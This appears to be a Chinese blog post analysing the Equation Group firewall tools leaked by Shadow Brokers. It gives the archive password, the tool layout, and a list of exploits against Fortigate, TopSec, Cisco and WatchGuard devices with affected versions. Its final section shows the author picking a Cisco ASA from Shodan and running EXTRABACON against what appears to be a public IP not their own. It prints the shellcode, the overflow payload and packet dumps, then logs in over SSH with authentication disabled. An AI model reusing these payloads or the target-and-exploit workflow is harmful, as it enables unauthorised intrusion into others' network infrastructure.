Equation Group(NSA合作黑客组织)的攻击工具分析

背景

Equation Group是一家和NSA(美国国家安全局)关系密切的黑客组织,被另一黑客组织ShadowBrokers(下面简称SB,怪怪的...)所攻击,并将EG的工具公布出来。

这次可以下载的包含两部分文件,一个是公布出来的PoC,另外一部分是加密的拍卖文件。

要公开这部分加密文件,SB宣称需要往他们比特币账户打一百万比特币。对于这么庞大的数字,猜测应该不是真的为了钱?!

还原事件过程,SB最先将文件放在Github上,通过Github公开事件接口可以看到SB的Github动态。

  • 2016-08-06 (创建Github账号)
  • 2016-08-13(上传的EQGRP文件)
  • 2016-08-15(关闭仓库,无法下载)

另外可以看到该Github注册的邮箱userll6gcwaknz@tutanota.comtutanota是一款安全性较高专注加密的邮箱,还被ISIS定义为圣战产品用来防止反监听。

下载

最开始公开在SB的Github上,但后来就关掉了,目前还可以在Mega上下载到。

Mega上的EQGRP-Auction-Files.zip下载下来解压后的文件

$ ls
128M  eqgrp-auction-file.tar.xz.gpg # 拍卖资源,密钥未公布,无法解密  
819B eqgrp-auction-file.tar.xz.gpg.sig  
182M eqgrp-free-file.tar.xz.gpg # 公布的PoC文件  
819B eqgrp-free-file.tar.xz.gpg.sig  
3.0K public.key.asc  
190B sha256sum.txt  
819B sha256sum.txt.sig  

解密eqgrp-free-file.tar.xz.gpg文件

# 输入密码(theequationgroup)
gpg --decrypt --output eqgrp-free-file.tar.xz eqgrp-free-file.tar.xz.gpg

# 解压压缩包
tar -xf eqgrp-free-file.tar.xz  

最终文件结构(目录)

$ tree -d
Firewall  
├── BANANAGLEE
│   ├── BANANAUSURPER
│   │   ├── BG2200_UPGRADE
│   │   │   └── UPGRADE
│   │   ├── BG3000_UPGRADE
│   │   │   └── UPGRADE
│   │   ├── BG3100_UPGRADE
│   │   │   └── UPGRADE
│   │   └── BG3121_UPGRADE
│   │       └── UPGRADE
│   ├── BG2100
│   ├── BG2200
│   ├── BG3000
│   ├── BG3100
│   └── BG3121
├── BARGLEE
│   └── BARGLEE3100
├── BLATSTING
│   ├── BLATSTING_20040x
│   ├── BLATSTING_20082
│   ├── BLATSTING_201280
│   ├── BLATSTING_201381
│   ├── BLATSTING_20322
│   ├── BLATSTING_20622
│   └── BLATSTING_21680
├── BUZZDIRECTION
│   ├── BUZZ_1120
│   └── BUZZ_1210
├── EXPLOITS - 利用工具
│   ├── EGBL
│   ├── ELBA
│   ├── ELBO
│   ├── ELCA
│   ├── ELCO
│   ├── EPBA
│   ├── ESPL
│   └── EXBA
├── OPS
├── SCRIPTS - 脚本
│   └── fw_wrapper
├── TOOLS - 工具
│   ├── Apache
│   ├── BenignCertain
│   │   ├── benigncertain-v1100
│   │   └── benigncertain-v1110
│   ├── DurableNapkin
│   ├── NOPEN
│   ├── ike-scan
│   ├── tftpd
│   └── thttpd
│       └── httptmp
└── TURBO
    ├── PIT
    └── TX

翻看了下文件,发现大部分是针对路由器、防火墙以及安全产品的攻击,大部分文件创建于2010年。

很多工具命令都是简写,只能通过注释、目标探测方式来判断作用。

利用工具(EQGRP-Auction-Files/Firewall/EXPLOITS/)缩写解释

EGBL = EGREGIOUS BLUNDER (Fortigate防火墙 + HTTPD exploit (apparently 2006 CVE )  
ELBA = ELIGIBLE BACHELOR  
ELBO = ELIGIBLE BOMBSHELL (天融信(TOPSEC)防火墙 versions 3.3.005.057.1 to 3.3.010.024.1)  
ELCA = ELIGIBLE CANDIDATE  
ELCO = ELIGIBLE CONTESTANT  
EPBA = EPIC BANANA  
ESPL = ESCALATE PLOWMAN  
EXBA = EXTRA BACON (Cisco Adaptive Security Appliance v8.0 to v8.4)  
BANANAGLEE = Juniper Netscreen Devices  
BARGLEE  
BLATSTING  
BUZZDIRECTION  
SP = ScreamPlow 2.3 (BG3001 BG3000 BG3100)  
BD = BannanaDaiquiri 3.0.5.1 (BG3001 BG3000 BG3100)  

作用

Exploits

我们天朝大国的天融信(TopSec)防火墙这下是出名了。

  1. EGREGIOUSBLUNDER

    • 目标:Fortigate防火墙
    • 漏洞:远程代码执行(利用HTTP Cookie覆盖)
    • 影响:涉及到60, 60M, 80C, 200A, 300A, 400A, 500A, 620B, 800, 5000, 1000A, 3600, 3600A等版本。
  2. ELIGIBLEBACHELOR

    • 目标:天融信防火墙
    • 漏洞:未知
    • 影响:涉及到 3.2.100.010, 3.3.001.050, 3.3.002.021, 3.3.002.030等版本。
  3. ELIGIBLEBOMBSHELL

    • 目标:天融信防火墙
    • 漏洞:远程代码执行(HTTP Cookie命令注入)
    • 影响:涉及3.2.100.010.1pbc17iv3到3.3.005.066.1
  4. WOBBLYLLAMA

    • 目标:天融信防火墙
    • 漏洞:未知
    • 影响: 3.3.002.030.8_003(开发版)
  5. FLOCKFORWARD

    • 目标:天融信防火墙
    • 漏洞:未知
    • 影响:3.3.005.066.1(开发版)
  6. HIDDENTEMPLE

    • 目标:天融信防火墙
    • 漏洞:未知
    • 影响:tos_3.2.8840.1(开发版)
  7. CONTAINMENTGRID

    • 目标:天融信防火墙
    • 漏洞:未知
    • 影响:tos_3.3.005.066.1(开发版)
  8. CONTAINMENTGRID

    • 目标:天融信防火墙
    • 漏洞:未知
    • 影响:3.2.100.010.8pbc27(开发版)
  9. ELIGIBLECANDIDATE

    • 目标:天融信防火墙
    • 漏洞:远程代码执行(基于HTTP Cookie命令注入)
    • 影响:3.3.005.057.1 到 3.3.010.024.1
  10. ELIGIBLECONTESTANT

    • 目标:天融信防火墙
    • 漏洞:远程代码执行(基于HTTP POST参数注入)
    • 影响:3.3.005.057.1 到 3.3.010.024.1
  11. EPICBANANA

    • 目标:思科ASA、思科PIX
    • 漏洞:默认密码(cisco)
    • 影响:ASA(711, 712, 721, 722, 723, 724, 80432, 804, 805, 822, 823, 824, 825, 831, 832 )、PIX(711, 712, 721, 722, 723, 724, 804)
  12. ESCALATEPLOWMAN

    • 目标:WatchGuard防火墙
    • 漏洞:注入代码(通过ifconfig命令)
    • 影响:未知
  13. EXTRABACON

    • 目标:思科ASA
    • 漏洞:远程代码执行
    • 影响:版本802, 803, 804, 805, 821, 822, 823, 824, 825, 831, 832, 841, 842, 843, 844
  14. BOOKISHMUTE

    • 目标:未知防火墙
    • 漏洞:未知
    • 影响:未知
  15. FALSEMOREL

    • 目标:未知防火墙
    • 漏洞:未知
    • 影响:未知

Implants

大部分用作植入某类防火墙的固件

  • BLATSTING
  • BANANAGLEE
  • BANANABALLOT
  • BEECHPONY
  • JETPLOW
  • SCREAMINGPLOW
  • BARGLEE
  • BUZZDIRECTION
  • FEEDTROUGH
  • JIFFYRAUL
  • BANNANADAIQUIRI
  • POLARPAWS
  • POLARSNEEZE

Tools

BILLOCEAN 检测防火墙序列号

FOSHO 一个Python库,用来创建利用的HTTP请求

BARICE 植入工具

DURABLENAPKIN 在局域网内注入数据包

BANANALIAR 植入工具

PANDAROCK 植入工具

SECONDDATE 针对思科 PIX设备的包注入

TEFLONDOOR 一个能自毁的程序

1212/DEHEX 转换hexademical字符串到目标服务器

XTRACTPLEASING 提取一些东西产生一个PCAP文件

NOPEN 有客户端和服务端,通过RC6对数据加密。

测试

测试下第13个EXTRABACON(位置在EQGRP-Auction-Files/Firewall/EXPLOITS/EXBA)

目标需要达到以下要求:

  • Cisco ASA防火墙
  • 版本号802, 803, 804, 805, 821, 822, 823, 824, 825, 831, 832, 841, 842, 843, 844
  • 开启了SNMAP(161端口可外部访问)

先安装下依赖

Mac OS X下按照下面操作,其它的参照Scapy

# Scapy
$ sudo port -d selfupdate
$ sudo port install scapy

# libdnet
$ wget http://libdnet.googlecode.com/files/libdnet-1.12.tgz
$ tar xfz libdnet-1.12.tgz
$ ./configure
$ make
$ sudo make install
$ cd python
$ python2.5 setup.py install

# pylibpcap
$ wget http://dfn.dl.sourceforge.net/sourceforge/pylibpcap/pylibpcap-0.6.2.tar.gz
$ tar xfz pylibpcap-0.6.2.tar.gz
$ cd pylibpcap-0.6.2
$ python2.5 setup.py install

# Readline
$ python `python -c "import pimp; print pimp.__file__"` -i readline

Shodan上挑一台Cisco ASA并且开了SNMP的防火墙(这个条件的真不好找:<)

$ cd EQGRP-Auction-Files/Firewall/EXPLOITS/EXBA/
$ python extrabacon_1.1.0.1.py exec -c pubString --mode pass-disable -t 86.43.107.74
WARNING: No route found for IPv6 destination :: (no default route?)  
Logging to /Volumes/Statics/Security/EquationGroup/EQGRP-Auction-Files/Firewall/EXPLOITS/EXBA/concernedparent  
[+] Executing:  extrabacon_1.1.0.1.py exec -c pubString --mode pass-disable -t 86.43.107.74
[+] probing target via snmp
[+] Connecting to 86.43.107.74:161
****************************************
[+] response:
###[ SNMP ]###
  version   = <ASN1_INTEGER[1L]>
  community = <ASN1_STRING['pubString']>
  PDU       
   |###[ SNMPresponse ]###
   |  id        = <ASN1_INTEGER[0L]>
   |  error     = <ASN1_INTEGER[0L]>
   |  error_index= <ASN1_INTEGER[0L]>
   |  varbindlist
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |  value     = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.3.0']>
   |   |  value     = <ASN1_TIME_TICKS[9300L]>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.5.0']>
   |   |  value     = <ASN1_STRING['LAB-ASA']>

[+] firewall uptime is 9300 time ticks, or 0:01:33

[+] firewall name is LAB-ASA

[+] target is running asa842, which is supported
Data stored in key file  : asa842  
Data stored in self.vinfo: ASA842  
[+] generating exploit for exec mode pass-disable
[+] using shellcode in ./versions
[+] importing version-specific shellcode shellcode_asa842
[+] building payload for mode pass-disable
appended PMCHECK_DISABLE payload bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3  
appended AAAADMINAUTH_DISABLE payload bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3  
[+] random SNMP request-id 59358486
[+] fixing offset to payload 53
overflow (112): 1.3.6.1.4.1.9.9.491.1.3.3.1.1.5.9.95.184.67.123.122.173.53.165.165.165.165.131.236.4.137.4.36.137.229.131.197.72.49.192.49.219.179.16.49.246.191.174.170.170.170.129.247.165.165.165.165.96.139.132.36.224.1.0.0.4.53.255.208.97.195.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.144.25.71.20.9.139.124.36.20.139.7.255.224.144  
payload (133): bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3c3  
EXBA msg (373): 308201710201010409707562537472696e67a582015f02040389bd160201000201013082014f30819106072b060102010101048185bfa5a5a5a5b8d8a5a5a531f8bba525f6ac31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bff08f530931c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3bfa5a5a5a5b8d8a5a5a531f8bba5b5adad31fbb9a5b5a5a531f9baa2a5a5a531facd80eb14bfe013080831c9b104fcf3a4e90c0000005eebece8f8ffffff31c040c3c33081b80681b32b060104010909836b010303010105095f8138437b7a812d3581258125812581258103816c048109042481098165810381454831814031815b813310318176813f812e812a812a812a81018177812581258125812560810b81042481600100000435817f8150618143811081108110811081108110811081108110811081108110811081108110811081108110811081108110811081108110811081108110811019471409810b7c2414810b07817f816081100500  
[+] Connecting to 10.1.1.250:161
[+] packet 1 of 1
[+] 0000   30 82 01 71 02 01 01 04  09 70 75 62 53 74 72 69   0..q.....pubStri
[+] 0010   6E 67 A5 82 01 5F 02 04  03 89 BD 16 02 01 00 02   ng..._..........
[+] 0020   01 01 30 82 01 4F 30 81  91 06 07 2B 06 01 02 01   ..0..O0....+....
[+] 0030   01 01 04 81 85 BF A5 A5  A5 A5 B8 D8 A5 A5 A5 31   ...............1
[+] 0040   F8 BB A5 25 F6 AC 31 FB  B9 A5 B5 A5 A5 31 F9 BA   ...%..1......1..
[+] 0050   A2 A5 A5 A5 31 FA CD 80  EB 14 BF F0 8F 53 09 31   ....1........S.1
[+] 0060   C9 B1 04 FC F3 A4 E9 0C  00 00 00 5E EB EC E8 F8   ...........^....
[+] 0070   FF FF FF 31 C0 40 C3 BF  A5 A5 A5 A5 B8 D8 A5 A5   ...1.@..........
[+] 0080   A5 31 F8 BB A5 B5 AD AD  31 FB B9 A5 B5 A5 A5 31   .1......1......1
[+] 0090   F9 BA A2 A5 A5 A5 31 FA  CD 80 EB 14 BF E0 13 08   ......1.........
[+] 00a0   08 31 C9 B1 04 FC F3 A4  E9 0C 00 00 00 5E EB EC   .1...........^..
[+] 00b0   E8 F8 FF FF FF 31 C0 40  C3 C3 30 81 B8 06 81 B3   .....1.@..0.....
[+] 00c0   2B 06 01 04 01 09 09 83  6B 01 03 03 01 01 05 09   +.......k.......
[+] 00d0   5F 81 38 43 7B 7A 81 2D  35 81 25 81 25 81 25 81   _.8C{z.-5.%.%.%.
[+] 00e0   25 81 03 81 6C 04 81 09  04 24 81 09 81 65 81 03   %...l....$...e..
[+] 00f0   81 45 48 31 81 40 31 81  5B 81 33 10 31 81 76 81   .EH1.@1.[.3.1.v.
[+] 0100   3F 81 2E 81 2A 81 2A 81  2A 81 01 81 77 81 25 81   ?...*.*.*...w.%.
[+] 0110   25 81 25 81 25 60 81 0B  81 04 24 81 60 01 00 00   %.%.%`....$.`...
[+] 0120   04 35 81 7F 81 50 61 81  43 81 10 81 10 81 10 81   .5...Pa.C.......
[+] 0130   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0140   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0150   10 81 10 81 10 81 10 81  10 81 10 81 10 81 10 81   ................
[+] 0160   10 19 47 14 09 81 0B 7C  24 14 81 0B 07 81 7F 81   ..G....|$.......
[+] 0170   60 81 10 05 00                                     `....
****************************************
[+] response:
###[ SNMP ]###
  version   = <ASN1_INTEGER[1L]>
  community = <ASN1_STRING['pubString']>
  PDU       
   |###[ SNMPresponse ]###
   |  id        = <ASN1_INTEGER[59358486L]>
   |  error     = <ASN1_INTEGER[0L]>
   |  error_index= <ASN1_INTEGER[0L]>
   |  varbindlist
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.2.1.1.1.0']>
   |   |  value     = <ASN1_STRING['Cisco Adaptive Security Appliance Version 8.4(2)']>
   |   |###[ SNMPvarbind ]###
   |   |  oid       = <ASN1_OID['.1.3.6.1.4.1.99.12.36.1.1.1.116.114.97.112.104.111.115.116.46.112.117.98.83.116.114.105.110.103.46.49.48.46.49.46.49.46.51.46.50']>
   |   |  value     = <ASN1_STRING['']>
[+] received SNMP id 59358486, matches random id sent, likely success
[+] clean return detected
{gfm-js-extract-pre-7}
$ ssh feei@86.43.107.74
feei@86.43.107.74's password:  
Type help or '?' for a list of available commands.  
LAB-ASA> ?  

引用参考